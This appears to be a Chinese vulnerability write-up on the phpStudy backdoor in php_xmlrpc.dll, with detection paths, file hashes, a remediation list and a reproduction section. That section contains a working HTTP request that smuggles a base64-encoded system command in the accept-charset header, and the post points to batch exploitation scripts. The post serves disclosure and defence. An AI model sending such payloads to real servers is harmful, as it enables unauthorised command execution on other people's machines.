phpStudy后门RCE,复现/批量脚本/修复
- 发表于
- Vulndb
phpStudy后门介绍
phpStudy是国内一款免费的PHP环境集成包,集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer等多款软件,无需配置即可直接安装使用,有着近百万PHP用户。近日被爆出phpStudy存在RCE后门,并通过验证复现。
- 软件作者声明:phpstudy 2016版PHP5.4存在后门。
- 实际测试官网下载phpstudy2018版php-5.2.17和php-5.4.45也同样存在后门
据传漏洞形成原因是官网被入侵后植入后门,嫌疑人已被抓。
后门检测方法
手动检查
后门代码存在于\ext\php_xmlrpc.dll模块中,phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45
phpStudy2016路径
|
1 2 |
php\php-5.2.17\ext\php_xmlrpc.dll php\php-5.4.45\ext\php_xmlrpc.dll |
phpStudy2018路径
|
1 2 |
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dl |
用记事本打开此文件查找@eval,文件存在@eval(%s(‘%s’))证明漏洞存在
附后门文件MD5值:
|
1 2 |
MD5: 0F7AD38E7A9857523DFBCE4BCE43A9E9 MD5: C339482FD2B233FB0A555B629C0EA5D5 |
工具检查并修复
官方发布了:phpstudy 安全自检修复程序,可用于2016 2018版本的安全检测与修复,下载该文件一键检查与修复。
phpStudy后门RCE与复现
|
1 2 3 4 5 6 7 8 9 |
GET / HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Connection: close accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7 Accept-Encoding: gzip,deflate Upgrade-Insecure-Requests: 1 |
其中要注意的是accept-charset,里边是要执行的命令base64加密。
RCE来源:https://www.cnblogs.com/-qing-/p/11575622.html,来源文章中作者还提供了phpStudy RCE批量与交互脚本,有意自取。
应对措施
- 对服务器进项全盘查杀,检查web程序是否存在后门和Webshell,检查操作系统是否有隐藏的账号以及后门。
- 使用phpStudy官方发布的自检修复程序进行检查与修复,地址在上面。
- 在官网下载全新的phpStudy程序,新版没有后门。
原文连接:phpStudy后门RCE,复现/批量脚本/修复
所有媒体,可在保留署名、
原文连接的情况下转载,若非则不得使用我方内容。
